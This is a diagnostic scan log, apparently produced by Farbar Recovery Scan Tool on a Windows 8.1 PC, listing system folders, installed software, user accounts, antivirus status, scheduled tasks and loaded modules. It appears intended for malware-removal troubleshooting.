2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\IME
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Defender
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\System
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Sysprep
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\oobe
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\WCN
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\Printing_Admin_Scripts
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ___SD C:\Windows\system32\dsc
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\MUI
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Com
2016-07-08 14:44 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Dism
2016-07-04 13:47 - 2013-08-22 16:20 - 00000000 ____D C:\Windows\CbsTemp
2016-07-02 14:42 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-07-02 14:23 - 2014-12-30 18:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-07-02 14:04 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-06-27 17:22 - 2013-08-22 15:44 - 05096392 _____ C:\Windows\system32\FNTCACHE.DAT
2016-06-21 14:46 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\AppCompat
2016-06-20 14:22 - 2014-11-21 16:14 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-06-20 14:22 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\AdvancedInstallers
2016-06-20 14:21 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ToastData
2016-06-16 16:47 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\AppReadiness
2016-06-16 00:20 - 2013-08-22 16:36 - 00262144 _____ C:\Windows\system32\config\BCD-Template
2016-06-15 18:47 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-06-15 15:39 - 2014-12-30 18:45 - 00000000 ____D C:\Windows\Panther
2016-06-15 15:39 - 2013-08-22 15:45 - 00000000 ____D C:\Windows\Setup
2016-06-15 15:36 - 2013-08-22 14:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-06-15 15:30 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows NT

==================== Files in the root of some directories =======

2016-06-21 17:06 - 2016-07-02 21:13 - 0000132 _____ () C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-07-13 19:56 - 2016-07-13 20:06 - 0047595 _____ () C:\Users\User not found\AppData\Roaming\ICARE.LOG

Some files in TEMP:
====================
C:\Users\User not found\AppData\Local\Temp\xmlUpdater.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-07-12 15:42

==================== End of FRST.txt ============================

 

 

 

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-07-2016 02
Ran by User not found (2016-07-15 22:20:38)
Running from C:\Users\User not found\Downloads
Windows 8.1 Pro (Update) (X64) (2016-06-15 14:39:02)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-2876588207-1483049806-666444280-500 - Administrator - Disabled)
Convidado (S-1-5-21-2876588207-1483049806-666444280-501 - Limited - Disabled)
User not found (S-1-5-21-2876588207-1483049806-666444280-1002 - Administrator - Enabled) => C:\Users\User not found

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\uTorrent) (Version: 3.4.7.42330 - BitTorrent Inc.)
Active Directory Authentication Library for SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Actualizações da NVIDIA 2.11.4.0 (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.1.2272 - AVAST Software)
Azure AD Authentication Connected Service (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
Dotfuscator and Analytics Community Edition 5.22.0 (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Kit de développement logiciel (SDK) Microsoft .NET Framework 4.6.1 (Français) (HKLM-x32\...\{9369E1F2-44C9-4864-843E-159725E660CB}) (Version: 4.6.01055 - Microsoft Corporation)
KMSpico (HKLM\...\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1) (Version:  - )
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (Français) (HKLM-x32\...\{AD054CB0-F527-48AD-832B-E65D46237C88}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - pt-pt (HKLM\...\ProPlusRetail - pt-pt) (Version: 16.0.6965.2058 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Express LocalDB  (HKLM\...\{AB8DE9BA-19E1-446A-BCFA-6B3DA9751E21}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.60519.0) (HKLM-x32\...\{4E27B0EF-7BAB-432A-AF3D-3FC8F3F7353F}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{68BA34E8-9B9D-4A74-83F0-7D366B532D75}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual Studio Enterprise 2015 (HKLM-x32\...\{aaff6d8c-30d0-4446-82ae-1f1650eab4b9}) (Version: 14.0.23107.178 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 pt-PT) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-PT)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MPC-HC 1.7.10 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.10 - MPC-HC Team)
MSBuild/NuGet Integration 14.0 (x86) (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
Multi-Device Hybrid Apps using C# - Templates - ENU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA Controlador gráfico 368.69 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.69 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA O controlador de HD Audio 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA O software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
Painel de controlo da NVIDIA 368.69 (Version: 368.69 - NVIDIA Corporation) Hidden
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Roslyn Language Services - x86 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (x32 Version: 14.0.25421 - Microsoft Corporation) Hidden
SafeZone Stable 1.48.2066.114 (x32 Version: 1.48.2066.114 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.25 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.25.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Explorer for Microsoft Visual Studio 2015 Update 3 CTP1 (x32 Version: 14.98.25331 - Microsoft) Hidden
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
TypeScript Power Tool (x32 Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.8.34.0 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Vegas Pro 13.0 (64-bit) (HKLM\...\{CDA02BF0-BFBC-11E3-AFA0-F04DA23A5C58}) (Version: 13.0.290 - Sony)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (x32 Version: 14.0.25421 - Microsoft Corporation) Hidden
vs_update3notification (x32 Version: 14.0.25421 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll ()
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {050F2B79-9879-4C6C-9791-9A59F8BA9F0E} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {14E6283D-7A9D-4001-AF08-EADFA636339C} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2015-08-30] (@ByELDI)
Task: {2B46C540-13C7-4223-A9E8-B151AEC07320} - System32\Tasks\SafeZone scheduled Autoupdate 1468434428 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-06-17] (Avast Software)
Task: {5E81E37A-2B8B-4582-B31A-19A2600373BF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-07-12] (Adobe Systems Incorporated)
Task: {60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9} - \Optimize Start Menu Cache Files-S-1-5-21-2194052053-610074514-4291411958-1001 -> No File <==== ATTENTION
Task: {844F311A-7390-4A90-8840-366EB7ACAE34} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-07-13] (AVAST Software)
Task: {84F6E367-CB1A-4AC1-9B77-9C0EF63929A5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-06-10] (Microsoft Corporation)
Task: {9E6CCC2E-7671-42ED-B217-768784D09FED} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-06-10] (Microsoft Corporation)
Task: {CE39F5C8-B6BE-431D-9166-DE4543A7FE3C} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {DE63146F-5DE7-4D7E-BE64-D85FD5BFAE63} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-07-13] (AVAST Software)
Task: {E6FE1A8C-196C-49EC-AFE7-28CEB3322CC1} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2876588207-1483049806-666444280-1002 => C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-06-16] (Microsoft Corporation)
Task: {E7AB858C-4657-4E87-BE7A-21D8DABD266C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-07-11 18:14 - 2016-06-29 19:37 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-06-16 19:41 - 2016-06-16 19:41 - 00959168 _____ () C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2016-05-17 23:42 - 2016-05-17 23:42 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2016-07-11 18:15 - 2016-06-29 23:44 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00165824 _____ () C:\Program Files\NVIDIA Corporation\ShadowPlay\gamecaster64.dll
2016-07-11 18:16 - 2016-06-29 23:44 - 00861120 _____ () C:\Program Files\NVIDIA Corporation\ShadowPlay\twitchsdk64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
